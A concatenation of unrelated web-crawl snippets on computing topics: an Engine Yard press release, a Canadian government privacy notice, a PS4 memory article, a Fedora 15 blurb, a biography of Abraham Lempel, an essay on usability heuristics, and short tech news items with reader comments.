· Mnesia - a distributed database management system, appropriate for telecommunications applications and other Erlang applications that require continuous operation and exhibit soft real-time properties. · Orber - an Erlang implementation of a CORBA object request broker.
· SNMP - a bilingual SNMP-extensible agent, featuring a MIB compiler and facilities for implementing SNMP MIBs.
There are also components for interfacing and communication, including an IDL compiler, low-level C and Java interfaces and a web server. | 计算机 |
2015-48/3680/en_head.json.gz/8429 | Engine Yard Triples Customer Base in 6 Months to Reach 1,000th Customer Milestone
Rapid Adoption of Public Platform-as-a-Service Offering Powers Company Growth
SAN FRANCISCO – March 11, 2010 – Engine Yard, the leader in Ruby on Rails automation and management technologies, today announced the company’s customer base has tripled in size in the last 6 months. With more than 1,000 customers, Engine Yard Cloud is the leading destination for business-critical applications built with Ruby on Rails. The company’s momentum has been fueled by the success of Ruby on Rails applications across many industries, with concentrations in social gaming and mobile applications.
"Engine Yard provides the scalability we need to provide customer support communities for tens of thousands of companies and easily scale to millions of monthly unique users," said Thor Muller, CTO and Co-founder of Get Satisfaction. "We rely on Engine Yard Cloud and the company’s expertise in Ruby on Rails to keep our sites available 24x7. Having visibility into operations performance and monitoring takes the heat off our developers, so they can focus on product development."
The past year at Engine Yard has been filled with key milestones, including:
The launch of the company’s public Platform-as-a-Service (PaaS) cloud offering. The Engine Yard PaaS has enjoyed rapid adoption by development teams because it removes the operational costs of managing technology infrastructure and significantly reduces application deployment and management expenses. This allows developers to spend more time building revenue-generating applications.
Closing $19 million in Series C funding. This round of funding has enabled Engine Yard to take Ruby on Rails deeper into the enterprise. Engine Yard continues to build out the Engine Yard Cloud to meet enterprise requirements, build support offerings for JRuby development teams, and continue to invest in the open source projects that are bringing new levels of productivity to developers worldwide.
"The introduction of our public cloud capabilities as a complement to our private cloud has allowed Engine Yard to meet a wider range of needs for organizations that see the value in bringing revenue-generating applications to market faster," said John Dillon, CEO of Engine Yard. "By using the Engine Yard Platform-as-a-Service, development teams are achieving cost savings and productivity gains because they no longer fight against the operational drag caused by application management issues and infrastructure headaches."
Engine Yard offers private and public Platform-as-a-Service (PaaS) cloud offerings that remove the drag of managing technology infrastructure and reduce application deployment and management expenses. This allows developers who use Engine Yard for their Rails-based applications to focus on their true passion – building great applications. With full-time contributors to Rails, JRuby and Rubinius – Engine Yard offers developers and businesses unmatched expertise for managing and deploying next-generation web applications.
For more information about Engine Yard product and service offerings, visit www.engineyard.com or call (866) 518-YARD.
About Engine Yard
Engine Yard is the leading provider of automation technologies and services for Ruby on Rails, including the Engine Yard Cloud, a Platform-as-a-Service (PaaS) for web developers and web teams. It provides easy-to-use, automated Rails application deployment and management, with a design philosophy that allows easy migration of existing applications. Engine Yard helps development teams realize productivity gains and cost savings by eliminating the operational overhead caused by application deployment issues and managing complex infrastructures. A significant contributor to the advancement of Open Source projects, Engine Yard employs top industry experts and sponsors or directly contributes to many projects such as Ruby on Rails, JRuby and Rubinius Headquartered in San Francisco, Calif., Engine Yard is backed by Benchmark Capital, New Enterprise Associates, and Amazon.com.
Horn Group for Engine Yard
Sabrina Cook
[email protected]
Theresa Maloney
Cogenta Communications for Engine Yard
[email protected]
Engine Yard Logos Company
Meetups & User Groups
Anti-Harassment Statement
Net Promoter System
Copyright © Engine Yard, Inc. All rights reserved. | 计算机 |
2015-48/3680/en_head.json.gz/8606 | Terms and conditions On this page:
The Government of Canada and the Canada Business Network are committed to providing websites that respect the privacy of visitors. This privacy notice summarizes the privacy practices for the Canada Business Network's online activities.
All personal information collected by this institution is governed by the Privacy Act. This means that you will be informed of the purpose for which your personal information is being collected and how to exercise your right of access to that information.
Your privacy and the Internet
The nature of the Internet is such that Web servers automatically collect certain information about a visit to a website, including the visitor’s Internet Protocol (IP) address. IP addresses are unique numbers assigned by Internet Service Providers (ISP) to all devices used to access the Internet. Web servers automatically log the IP addresses of visitors to their sites. The IP address, on its own, does not identify an individual. However, in certain circumstances, such as with the co-operation of an ISP for example, it could be used to identify an individual using the site. For this reason, the Government of Canada considers the IP address to be personal information, particularly when combined with other data automatically collected when visitor requests a Web page such as the page or pages visited, date and time of the visit.
Unless otherwise noted, the Canada Business Network does not automatically gather any specific information from you, such as your name, telephone number or email address. The Canada Business Network would obtain this type of information only if you supply it to us, for example, by email or by filling in a contact form. In such cases, how your personal information is handled will be provided in a Personal Information Collection Statement.
In cases where services are provided by organizations outside of the Government of Canada, such as social media platforms or mobile applications, IP addresses may be recorded by the Web server of the third-party service provider.
Communicating with the Government of Canada
If you choose to send the Canada Business Network an email or complete a feedback form online, your personal information is used by the Canada Business Network in order to respond to your inquiry. The information you provide will only be shared with another government institution if your inquiry relates to that institution. The Canada Business Network does not use the information to create individual profiles nor does it disclose the information to anyone other than to those in the federal government who need to provide you with a response. Any disclosure of your personal information is in accordance with the Privacy Act.
Emails and other electronic methods used to communicate with the Government of Canada are not secure unless it is specifically stated on a Web page. Therefore, it is recommended that you do not send sensitive personal information, such as your Social Insurance Number or your date of birth, through non-secure electronic means.
Personal information from emails or completed feedback forms is collected pursuant to the provision in Industry Canada’s enabling statutes. Such information may be used for statistical, evaluation and reporting purposes and is included in personal information bank PSU 914 - Public Communications.
Third-party social media
The Canada Business Network’s use of social media serves as an extension of its presence on the Web. Social media account(s) are public and are not hosted on Government of Canada servers. Users who choose to interact with us via social media should read the terms of service and privacy policies of these third-party service providers and those of any applications you use to access them. The Canada Business Network uses Facebook, Twitter, and YouTube.
Personal information that you provide to the Government of Canada via social media account(s) is collected under the authority of the provision in Industry Canada’s enabling statutes. This information is collected to capture conversations (e.g. questions and answers, comments, “likes”, retweets) between you and the Canada Business Network. It may be used to respond to inquiries, or for statistical, evaluation and reporting purposes. Comments posted that violate Canadian law will be deleted and disclosed to law enforcement authorities. Comments that violate our rules of engagement will also be deleted. The personal information is included in personal information bank PSU 938 - Outreach Activities.
Improving your experience on Government of Canada websites
Digital markers (including cookies)
A digital marker is a resource created by the visitors’ browser in order to remember certain pieces of information for the Web server to reference during the same or subsequent visit to the website. Examples of digital markers are “cookies” or HTML5 web storage. Some examples of what digital markers do are as follows:
They allow a website to recognize a previous visit each time the visitor accesses the site
They track what information is viewed on a site which helps website administrators ensure visitors find what they are looking for.
The Canada Business Network uses sessional and persistent digital markers on some portions of its website. During your on-line visit, your browser exchanges data with the Canada Business Network’s Web server. The digital markers used do not allow the Canada Business Network to identify individuals.
You may adjust your browser settings to reject digital markers, including cookies, if you so choose. However, it may affect your ability to interact with the Canada Business Network’s website.
Web analytics is the collection, analysis, measurement, and reporting of data about Web traffic and visits for purposes of understanding and optimizing Web usage. Information in digital markers may be used for the purpose of web analytics to remember your online interactions with the Canada Business Network’s website.
The Canada Business Network uses Google Analytics to improve its web site. When your computer requests a Canada Business Network Web page, our institution collects the following types of information for Web analytics:
Originating IP address
Date and time of the request
Type of browser used
Page(s) visited
The Canada Business Network uses Google Analytics and the information collected is disclosed to Google Inc., an external third party service provider. Your IP address is anonymized prior to being stored on the service provider's servers in order to help safeguard your privacy. The information collected is de-personalized by activating the anonymization feature in Google Analytics.
Data collected for Web analytics purposes goes outside of Canada to the United States and may be subject to the governing legislation of that country, the USA Patriot Act.
Information used for the purpose of Web analytics is collected pursuant to Industry Canada's enabling statutes. Such data may be used for communications and information technology statistical purposes, audit, evaluation, research, planning and reporting. For more information on how your privacy is safeguarded in relation to web analytics, see the Standard on Privacy and Web Analytics.
Protecting the security of Government of Canada websites
The Canada Business Network employs software programs to monitor network traffic to identify unauthorized attempts to upload or change information, or otherwise cause damage. This software receives and records the IP address of the computer that has contacted our website, the date and time of the visit and the pages visited. We make no attempt to link these addresses with the identity of individuals visiting our site unless an attempt to damage the site has been detected.
This information is collected pursuant to section 161 of the Financial Administration Act. The information may be shared with appropriate law enforcement authorities if suspected criminal activities are detected. Such information may be used for network security related statistical purposes, audit, evaluation, research, planning and reporting and is included in personal information bank PSU 939 - Security Incidents.
Inquiring about these practices
Any questions, comments, concerns or complaints you may have regarding the administration of the Privacy Act and privacy policies regarding the Canada Business Network’s Web presence may be directed to our Access to Information and Privacy Coordinator by email to [email protected], by calling 613-952-2088 or writing to:
Information and Privacy Rights Administration
2nd Floor, West Tower
C.D. Howe Building
235 Queen Street
Ottawa, ON K1A 0H5
If you are not satisfied with our response to your privacy concern, you may wish to contact the Office of the Privacy Commissioner by telephone at 1-800-282-1376.
Using files located on non-Government of Canada servers
To improve the functionality of Government of Canada websites, certain files (such as open source libraries, images and scripts) may be delivered automatically to your browser via a trusted third-party server or content delivery network. The delivery of these files is intended to provide a seamless user experience by speeding response times and avoiding the need for each visitor to download these files. Where applicable, specific privacy statements covering these files are included in our Privacy Notice.
Providing content in Canada's official languages
The Official Languages Act, the Official Languages (Communications with and Services to the Public) Regulations and Treasury Board policy requirements establish when we use both English and French to provide services to or communicate with members of the public. When there is no obligation to provide information in both official languages, content may be available in one official language only. Information provided by organizations not subject to the Official Languages Act is in the language(s) provided. Information provided in a language other than English or French is only for the convenience of our visitors.
Linking to non-Government of Canada websites
Links to websites not under the control of the Government of Canada, including those to our social media accounts, are provided solely for the convenience of our website visitors. We are not responsible for the accuracy, currency or reliability of the content of such websites. The Government of Canada does not offer any guarantee in that regard and is not responsible for the information found through these links, nor does it endorse the sites and their content.
Visitors should also be aware that information offered by non-Government of Canada sites to which this website links is not subject to the Privacy Act or the Official Languages Act and may not be accessible to persons with disabilities. The information offered may be available only in the language(s) used by the sites in question. With respect to privacy, visitors should research the privacy policies of these non-government websites before providing personal information.
Ownership and usage of content provided on this site
Materials on this website were produced and/or compiled by the Canada Business Network for the purpose of providing Canadians with access to information about the programs and services offered by the Government of Canada. You may use and reproduce the materials as follows:
Non-commercial reproduction
Unless otherwise specified you may reproduce the materials (excluding images) in whole or in part for non-commercial purposes, and in any format, without charge or further permission, provided you do the following:
Exercise due diligence in ensuring the accuracy of the materials reproduced;
Indicate both the complete title of the materials reproduced, as well as the author (where available); and
Indicate that the reproduction is a copy of the version available at CanadaBusiness.gc.ca.
Images may not be reproduced in whole or in part.
Commercial reproduction
Unless otherwise specified, you may not reproduce materials on this site, in whole or in part, for the purposes of commercial redistribution without prior written permission from Industry Canada.
To obtain permission to reproduce Government of Canada materials on this site for commercial purposes, Apply for Crown Copyright Clearance or write to:
Communications and Marketing Branch
Email: [email protected]
You may also contact us to obtain additional information concerning copyright ownership and restrictions, as some of the content on this site may be subject to the copyright of another party. Where information has been produced or copyright is not held by Government of Canada, the materials are protected under the Copyright Act and international agreements. Details concerning copyright ownership are indicated on the relevant page(s).
The official symbols of the Government of Canada, including the Canada Wordmark, the Arms of Canada, and the flag symbol may not be reproduced, whether for commercial or non-commercial purposes, without prior written authorization.
Our commitment to accessibility
The Government of Canada is committed to achieving a high standard of accessibility as defined in the Standard on Web Accessibility and the Standard on Optimizing Websites and Applications for Mobile Devices. In the event of difficulty using our Web pages, applications or device-based mobile applications, please contact us for assistance or to obtain alternative formats such as regular print, Braille or another appropriate format.
Social media terms of use
This notice has been written to explain how the Canada Business Network interacts with the public on social media platforms.
Content and frequency
We use our social media accounts as an alternative method of sharing the content posted on our website and interacting with our stakeholders. By following our social media accounts (by “following,” “liking” or “subscribing”), you can expect to see information about the programs and services we provide.
We understand that the Web is a 24/7 medium, and your comments are welcome at any time. You should expect to see new content posted Monday to Friday from 8:00 a.m. to 6:00 p.m. EST/EDT. Comments submitted after hours or on weekends will be read and responded to as soon as possible.
Because the servers of social media platforms are managed by a third party, our social media accounts are subject to downtime that may be out of our control. As such, we accept no responsibility for platforms becoming unresponsive or unavailable.
Links to other websites and ads
Our social media accounts may post or display links or ads for websites that are not under our control. These links are provided solely for the convenience of users. The Government of Canada is not responsible for the information found through these links or ads, nor does it endorse the sites or their content.
Following, "favouriting" and subscribing
Our decision to “follow,” “favourite” or “subscribe” to another social media account does not imply an endorsement of that account, channel, page or site, and neither does sharing (re-tweeting, reposting or linking to) content from another user.
Comments and interaction
We will read comments and participate in discussions when appropriate. We ask that your comments be relevant and respectful. We reserve the right to delete comments that violate this notice, and the user may be blocked and reported to prevent further inappropriate comments.
We cannot engage in issues of party politics or answer questions that break the rules of this notice.
We reserve the right to edit or remove comments that:
Contain personal information;
Are contrary to the principles of the Canadian Charter of Rights and Freedoms;
Express racist, hateful, sexist, homophobic, slanderous, insulting or life-threatening messages;
Put forward serious, unproven or inaccurate accusations against individuals or organizations;
Are aggressive, coarse, violent, obscene or pornographic;
Are offensive, rude or abusive to an individual or an organization;
Are not sent by the author or are put forward for advertising purposes;
Encourage illegal activity;
Contain announcements from labour or political organizations;
Are written in a language other than English or French;
Are unintelligible or irrelevant;
Are repetitive or spam; and
Do not, in our opinion, add to the normal flow of the discussion.
In short, please be respectful and make sure that your comments are relevant to where they are posted. The views of users commenting on our social media accounts do not necessarily represent the views of the Canada Business Network or the Government of Canada.
Accessibility of social media platforms
Social media platforms are third-party service providers and are not bound by Government of Canada standards for Web accessibility.
If you have difficulty accessing content on our social media accounts, please contact us and we will try to solve the problem or provide you with the information in a different format.
Information that we post is subject to the Copyright Act.
Our social media accounts are not Government of Canada websites and represent only our presence on third-party service providers.
For more information, please refer to our Privacy Notice regarding third-party social media.
Many social media platforms have multiple language options and provide instructions on how to set your preferences. The Government of Canada respects the Official Languages Act and is committed to ensuring that our information of is available in both French and English and that both versions are equal quality.
We reply to comments in the official language in which they are posted. If we think the response is a question of general public interest, we may respond in both official languages.
We may share links that direct users to sites of organizations or other entities that are not subject to the Official Languages Act and available only in the language(s) in which they are written. When content is available in only one language, we make an effort to provide similar content in the other official language.
Questions and media requests
Reporters are asked to send questions to:
Email: [email protected]
Business hours (Eastern Time): 7:30 a.m. to 6 p.m.
Information on this website comes from third-parties including many different federal departments and agencies, as well as external sources and other levels of government. Every effort is made to ensure the accuracy, currency and reliability of the content. Users who wish to use this information or to avail themselves of the services may contact the Canada Business Network centre in their province or territory using the toll-free lines and a business information officer will be pleased to help.
Government About this site | 计算机 |
2015-48/3680/en_head.json.gz/8717 | Last year, Hewlett Packard Company announced it will be separating into two industry-leading public companies as of November 1st, 2015. HP Inc. will be the leading personal systems and printing company. Hewlett Packard Enterprise will define the next generation of infrastructure, software and services.
Public Sector eCommerce is undergoing changes in preparation and support of this separation. You will still be able to purchase all the same products, but your catalogs will be split into two: Personal systems, Printers and Services and Servers, Storage, Networking and Services. Please select the catalog below that you would like to order from.
Note: Each product catalog has separate shopping cart and checkout processes.
Personal Computers and Printers
Select here to shop for desktops, workstations, laptops and netbooks, monitors, printers and print supplies Server, Storage, Networking and Services
Select here to shop for Servers, Storage, Networking, Converged Systems, Services and more.
Privacy Statement | Limited Warranty Statement | Terms of Use ©2015 Hewlett Packard Development Company, L.P | 计算机 |
2015-48/3680/en_head.json.gz/10324 | Game Developer Applauds 8GB of Memory on PlayStation 4 Game Console
Lead Level Designer of Dishonored Calls PS4's 8GB of Memory a “Joy”
by Anton Shilov
03/08/2013 | 12:41 PM
Modern video games require a lot of memory not only to store things like textures or various graphics-related data, but also to store a lot of information about game levels and many other things. Not surprising that game developers praise Sony Corp. for installing 8GB of GDDR5 into the upcoming PlayStation 4 game console.
“As a level designer we are struggling against memory every day. We cut things, we remove things, we strip things, we split the levels, we remove NPCs from levels because there's not enough memory. So knowing that memory is something that is going to be improved in the next generation of consoles: to us, it is a joy. It is something that we were waiting for,” said Christophe Carrier, a lead level designer at Arkane Studios, who worked on Dishonored video game, in an interview with Eurogamer web-site.
Current-generation video-game consoles from Microsoft and Sony have 512MB of random access memory, a catastrophically insufficient amount by today’s standard. As a result of insufficient amount of memory, many games look and feel much better on the PC, where developers do not have to cut-down objects or levels in a bid to enable smooth frame rate. The majority of gaming PCs today have from 4GB to 8GB of memory. The next-generation game consoles will also feature 8GB of random access memory.
“We were PC gamers at the beginning. We love PC games, and we had to make games on consoles. But the main problem was memory. The processors are good, but the memory, for our games, is the most important. So [8GB] is great,” said Mr. Carrier.
Besides loads of memory, Sony PlayStation 4 platform offers a number of other innovations, such as heterogeneous multi-core AMD Fusion system-on-chip with eight x86 general-purpose cores as well as custom AMD Radeon HD graphics core with 1152 stream processors, Gaikai-powered social features and so on. It remains to be seen how and where will Arkane Studios utilize those advanced technologies.
“We are looking forward at how we can integrate all those things into our [next] game,” said Dinga Bakaba, Dishonored game designer and associate producer. | 计算机 |
2015-48/3680/en_head.json.gz/10911 | release date:May 24, 2011
The Fedora Project is an openly-developed project designed by Red Hat, open for general participation, led by a meritocracy, following a set of project objectives. The goal of The Fedora Project is to work with the Linux community to build a complete, general purpose operating system exclusively from open source software. Development will be done in a public forum. The project will produce time-based releases of Fedora about 2-3 times a year, with a public release schedule. The Red Hat engineering team will continue to participate in building Fedora and will invite and encourage more outside participation than in past releases. Fedora 15, a new version of one of the leading and most widely used Linux distributions on the market, has been released. Some of the many new features include support for Btrfs file system, Indic typing booster, redesigned SELinux troubleshooter, better power management, LibreOffice productivity suite, and, of course, the brand-new GNOME 3 desktop: "GNOME 3 is the next generation of GNOME with a brand new user interface. It provides a completely new and modern desktop that has been designed for today's users and technologies. Fedora 15 is the first major distribution to include GNOME 3 by default. GNOME 3 is being developed with extensive upstream participation from Red Hat developers and Fedora volunteers, and GNOME 3 is tightly integrated in Fedora 15." manufacturer website
1 dvd for installation on a x86 platform back to top | 计算机 |
2015-48/3681/en_head.json.gz/233 | ETHW
Engineering and Technology History Wiki
Browse by Subject Encyclopedia Oral Histories First Hand Histories Landmarks/Milestones Archives Education Random page Help Contact us Recent changes New pages Actions View source History Page Discussion Tools What links here Related changes Special pages Printable version Permanent link Page information Browse properties Account Log inRequest account Abraham Lempel
Abraham Lempel is considered a pioneer in data compression. In 1977 and 1978, Dr. Lempel and his colleague, Professor Jacob Ziv, invented the first two iterations of the Lempel-Ziv (LZ) Data Compression Algorithm. Since then, the LZ Algorithm and its derivatives have become some of the most widely used data compression schemes, making the use of loss-less data compression pervasive in day-to-day computing and communication. With this compression method, information is transmitted and stored over the Internet and stored more efficiently on computer networks and other types of media storage. Dr. Lempel’s academic career spans more than 40 years, having taught both electrical engineering and computer science at Technion, the Israel Institute of Technology, from 1963 to 2004. He has held the title of full professor since 1977 and served as head of the Technion computer science department from 1981 to 1984. Dr. Lempel joined Hewlett-Packard Labs in 1993, and a year later, established HP Labs Israel, where he currently serves as director, overseeing the development of fundamental and universal image processing tools, as well as application-driven customization. An IEEE Fellow, HP Senior Fellow and Erna and Andrew Viterbi Professor Emeritus, Dr. Lempel holds eight U.S. patents, and has authored over 90 published works on data compression and information theory. He has received numerous awards and honors from the IEEE and other industry organizations. In 2004, the IEEE Executive Committee and History Committee proclaimed the LZ Algorithm to be an IEEE milestone for enabling the efficient transmission of data via the Internet.
Retrieved from ‘http://ethw.org/index.php?title=Abraham_Lempel&oldid=102040’
Categories: Computing and electronicsInformation theory Contents
About ETHW | 计算机 |
2015-48/3681/en_head.json.gz/653 | Debating the Fundamentals : The geographic, temporal and political nature of usability heuristics
The debates between specific usability heuristics will come to shape your career as a designer.
Article No :727 | September 8, 2011 | by Alex Faaborg
Usability heuristics are each hailed as irrefutably true. They serve as our shared vocabulary for expressing why an interface is good or bad, and as an effective tool for teaching people about interactive design. In isolation, each heuristic presents an obvious path towards creating an optimal design. Showing feedback is better than not showing feedback, providing access to help is better than not providing access to help, and preventing an error is better than not preventing an error. On the surface, usability heuristics provide a simple checklist for making any interface perfect. But what is fascinating about them is the extent to which all of the heuristics are actually in direct opposition to each other, the extent to which they are geographic and temporal, and the extent to which they expose the designer's underlying political views (at least in the domain of things digital). Usability heuristics present a zero-sum game with inherent tradeoffs, and it is simply impossible to achieve all of the heuristics simultaneously. The debates between specific usability heuristics will come to shape your career as a designer. While every interface has a different purpose and context, I believe the underlying debates ultimately remain the same. And just like all great human debates, these are shaped by geography, time, and politics. Geography: Simplicity Versus Complexity Perhaps the most immediately obvious contention in Nielsen's usability heuristics is that simplicity carries different connotations in different geographic regions. In Western cultures, simplicity has a very positive connotation: a simple object is viewed as being elegant and sleek. However, in Eastern cultures this emotional affiliation is reversed: complexity has a positive connotation that leads to thoughts of an object being powerful and functional. This effect doesn't just apply to industrial design, but to software as well. Firefox's localization in China doesn't just translate the language of the interface, but also the interactive design. Unlike Western localizations of Firefox, the Chinese localization includes a plethora of additional functionality. The interface contains a window with constantly updating contextual information based on the information you've selected. It's designed for browsing the Web while simultaneously streaming television and music in the background. It has a button for quickly launching a calculator. While a Western user might see these extra features as unnecessary and cluttered, users in China appreciate them. Time: Recognition Versus Recall One of the heuristics that drives increased complexity in graphical interfaces (which isn’t always bad) asserts that recognition is better than recall (which isn’t always true). While recognition (seeing something) is commonly considered superior to recall (remembering something), there's a caveat. If the user already remembers what he wants, showing him additional options may slow him down as he considers the various alternative options. Recognition wins in terms of users eventually finding something, but it loses in terms of creating the fastest and most efficient interface. Google's homepage is the epitome of both simplicity and efficiency: a blank white page with a single field. When you focus the field, there is only a flashing cursor. You are alone with your thoughts; there are no distractions. In contrast, Bing provides a daily image with explorable regions containing factoids. When you click in the search field, it provides suggestions based on what people are searching on now, including popular culture entertainment news like "Lady Gaga Howard Stern" and "Julianne Hough." Which interface is better? It depends on how bored the user is. But it also depends on how bored you want the user to be. Do you want the user to be curious or passive? If the user already knows what she wants to search for, these types of alternative targets will likely slow her down. Another consideration is efficiency. Users selecting their intention with a mouse are considerably slower than users entering their intention with a keyboard. This is due to the physical constraints of the input devices, the cognitive load being placed on users when presented with options they don't actually want, and the relative search spaces of graphical objects on the screen versus any sequence of characters. When it comes to efficiency, recognition is not always better than recall. Consider the interfaces being used by ticket agents in airports. In the 1980s, they were fast, textual, and keyboard-based. Modern replacements are more commonly slow, graphical, and mouse-based. Watch your ticket agent's eyes narrow slightly in frustration as he reaches for the mouse. Time: Consistency Versus New If recognition versus recall is a tradeoff in small amounts of time (seconds per interaction), then consistency is a tradeoff in large amounts of time (years between product releases). It's hard to find a designer who will argue against consistency; leveraging users’ existing knowledge can bootstrap their adoption of a product. Documented interface guidelines help establish a core set of common interaction patterns that should be shared between applications. But the problem with enforcing this sort of consistency is it inhibits innovation. Unlike desktop applications, which have large widget libraries and well-established UI guidelines, the Web provides designers with a blank canvas and only the most basic interactive widgets. While the interactive design of desktop applications is generally pretty consistent, the Web has a very high variability. The lack of guidelines and direction for web applications has resulted in an extremely broad range of quality. Some web applications are absolutely awful and some, such as Gmail, are considerably better than their desktop competitors. The Outlook interface feels like it wasn’t designed for managing your email as much as it was designed to mirror the interaction paradigms of applications like Word and Excel. UI widgets such as the tree, the splitter, the accordion, and the ribbon seem to be used primarily because they are available and familiar to users. But in interactive design, consistency doesn't guarantee a fantastic interface as much as it simply mitigates risk. The second argument against consistency has more to do with product perception than actual interactive design. While interfaces don't exactly go bad over time like milk or produce, a strict adherence to consistency does send a message to users that a product is becoming stale. Interfaces don't actually decay, but design evolves over time such that it is relatively easy to look at an application and give it a rough carbon dating. In a market where users are constantly seeking the newest product, fashion is a consideration. Politics: User Control and Freedom There aren't a lot of designers out there who are opposed to giving users control. But the debates around the benefits of user control are some of the most fascinating, and also the most political, because essentially the debate is this: to what extent should people be free? Should we take a digital-libertarian stance and put users fully in charge of managing their digital lives? Is the freedom they are granted worth the responsibility and consequences? Or should we take a more digital-authoritarian stance and build a perfect walled garden with gated access, where users are guarded and protected? Do users actually want to be in control? If we ask them a question, will they make the correct choice? Let's look at an example. Should users be able to control when a software application updates, and should they be able to undo that decision? Firefox's update dialog boxes can become very annoying over time, but they were nonetheless created with the best of intentions. Developers at Mozilla believed that it was a violation of user sovereignty to silently force an upgrade onto the user's machine. In contrast, developers on Chrome introduced a silent update system that takes control away from users. Avoiding disrupting users with administrative questions is widely regarded as providing a more pleasant experience even though it takes away user control. What about the control and freedom to extend the capabilities of a software application? Firefox is renowned for its ability to be extended and customized. But over time some users install so many extensions, and some of them are so poorly written, that the performance of the browser itself suffers considerably. A similar problem has to do with battery life on Android devices. Some applications make heavy use of GPS, others access the network too often for updates, and others (e.g., Flash) put enough load on the CPU to make the device physically warm. When it comes to control, Android is rather digital-libertarian. If you dig into the preferences, you can view the actual distribution of battery usage, and then take on the personal responsibility to choose which applications you would like to use based on this data. A designer on the digital-libertarian side of debate believes that users need to have the personal responsibility to make the correct decisions for themselves. You don't want to update the application? You don't have to. The application is running too slow? It's your own fault for installing 15 extensions. Your battery only lasted an hour? Don't run Flash next time. Would you like to hideously customize your MySpace profile page? Sure! Why not add a soundtrack as well! The highest priority is freedom; how good your experience is with the product is left entirely up to you. A designer on the digital-authoritarian side of the debate believes that applications should make the best decisions on the user’s behalf. You don't want to update the application? It's a security update and you don't have a choice. Worried about your application running too slow? Don't worry, we've detected your attempted modification and disabled it for you. Want a longer battery life? We've banned Flash from our platform. Would you like to customize your Facebook profile page? Yeah, not so much… remember MySpace? The highest priority is making a product that is insanely great, and you can't be trusted. This leads us to perhaps the broadest question of user control: should users be able to install any application they choose on their computer? Windows has traditionally been a very open operating system, giving users a great deal of control and freedom. Users can install anything they want, including malware, provided they get past the "are you really, really, sure?" dialog boxes with big shiny shields on them. This level of control and freedom is both what is great and what is horrible about the experience of using Windows. In the lead-up to Microsoft’s anti-trust trial, Bill Gates made the point that no one has ever asked Microsoft for permission to write a Windows application. At the time, few considered how important that was, or thought very deeply about the statement. In contrast, look at iOS, where you can only install applications that have been approved by Apple. iPads and iPhones don't degrade, they don't get malware, and they don't ask you if you happen to trust the people who created the software you are about to install. In the rare event that a malicious piece of code gets into the walled garden, they can target and eliminate it from orbit. And then the garden is perfect again. Most designers would argue that the iPad provides a fantastic user experience, but it does so in part because it doesn't trust you enough to let you mess it up. Conclusion There are a number of ongoing debates in the field of interactive design. From sections above, you might conclude that you should: Value complexity over simplicity, it's more functional Value recall over recognition, it's more efficient Value change over consistency, it's more innovative Take away user control and freedom, and do it quickly, ideally before your users completely wreck the experience And this is all true… sometimes, depending on a lot of factors. Novice designers memorize the list of usability heuristics and try to employ them in their work. As a more experienced designer, you may have already seen a deeper dynamic at play here. Instead of using heuristics as a simple checklist, try placing pairs of the heuristics against one another in a spider graph: Achieving every ideal isn't possible because the pairs exist in direct opposition. Realizing this, the challenge shifts to shaping a design that captures as much surface area as it can, given all the opposing forces. About the author: Alex Faaborg is, generally speaking, a pro-simplicity, pro-efficiency, anti-consistency designer who happens to be a secret digital-authoritarian sympathizer. He works on the design of Firefox at Mozilla, one of the most digital-libertarian organizations in existence.
Alex Faaborg Alex Faaborg is a principal designer at Mozilla, where he focuses on the visual and interactive design of Firefox. He also contributes to Mozilla Labs, which explores the next stage in the evolution of the Web and its long term future. He has extensive experience in artificial intelligence, user interface design, and cognitive science and is a graduate of the MIT Media Laboratory. Key topics in this article
HeuristicsPatents and Closed SystemsProduct designSimplicityUsability
It's important to note that everything this article says about the Apple walled garden also applies to the Android Market. Google can and does remove malicious apps from the Market. I've never been bitten by malware on my Android phone.
The malicious app argument is a red herring. Walled gardens are not necessary to exert the kind of control that Apple uses to improve user experience. They serve exactly one purpose: earning money for the garden's curator.
Here, Google has the right balance between digital libertarianism and authoritarianism: do the right thing for the user by default, but allow users with different opinions about what is right to do something else.
"Usability heuristics are...irrefutably true?" If designers really think that, a bit of debunking (as in this article) is in order. Context and audience are always part of the usability equation (even in the ISO standards, it includes specifying the audience, context, and task. A heuristic is a rule of thumb, not a metric or standard. Even guidelines like "efficiency" are always based on not only the context but audience expectations. That's why "usability requirements" are so hard to write (assuming you want requirements with hard metrics).
A heuristic review is done by experts because there is always judgement involved. The question isn't "is this efficient?" (for example) but "Is this appropriately efficient in terms of both time and effort for how real people will use this product?"
Great stuff. I think it's easy to forget that usability heuristics are relative to the target audience/users. | 计算机 |
2015-48/3681/en_head.json.gz/971 | Duke Nukem Developer Calls It Quits
Michael Barkoviak - May 7, 2009 1:49 PM
78 comment(s) - last by Bubbacub.. on May 14 at 8:50 AM
If you've been waiting for Duke Nukem Forever, and still had faith in the project, this news will sadden you
After numerous delays and years of hype in the gaming community, it looks like 3D Realms will never release Duke Nukem Forever, as the game studio has run out of money and will close its doors.
"We can confirm that our relationship with 3D Realms for Duke Nukem Forever was a publishing arrangement, which did not include ongoing funds for development of the title," explained publisher Take-Two.
Duke Nukem Forever has been in development for more than 12 years and was a follow-up to the popular 3D video game released by 3D Realms in 1996. The studio's games were popular more than a decade ago, but simply couldn't match game studio development in the 21st century, according to video game industry analysts.
The studio also worked on Commander Keen and Major Stryker, which were popular but never reached the same level as Duke Nukem and Wolfenstein 3D.
Take-Two and other studios involved in the project noted that the game may not be fully dead, but after such a long delay in development, it's highly unlikely the game will ever hit store shelves.
"Development of the Duke Nukem Trilogy is continuing as planned and further announcements about upcoming games will be made in the near future," according to a statement issued by Apogee Software.
News of the studio's closure is especially ironic as 3D Realms recently celebrated the 17th anniversary of its release of Wolfenstein 3D, which first hit the market in 1992.
RE: argh
Hudly
DNCORNHOLIOIn honor of this tragic event, I am going to install my original Duke3D (1.3d) and run it with JDuke3D and then beat it, then play my Duke It Out in D.C. expansion, and THEN play my Life's a Beach expansion.I miss this game. It is still amazing. And I'm very sad to hear that Duke4Ever will probably never see the light of day.*whistles Indian Jones theme Parent
acase
DNSTUFF Parent
cheetah2k
............DNF......................1992-2009..............A kind and loving man....Loved guns & blowing $hit upSurvived by his undying fans.......may he R.I.P......... Parent | 计算机 |
2015-48/3681/en_head.json.gz/978 | Report: Retail Office 2013 Software Can Only Be Installed on a Single PC for Life
47 comment(s) - last by Xplorer4x4.. on Feb 19 at 7:09 PM
Microsoft makes Office 2013 licensing much more restrictive
Microsoft has certainly made its share of strange moves over the years when it comes to software licensing. However, the company has again raised the ire of its customers with a change in retail licensing agreement for Office 2013. Microsoft confirmed this week that Office 2013 will be permanently tied to the first computer on which it is installed.
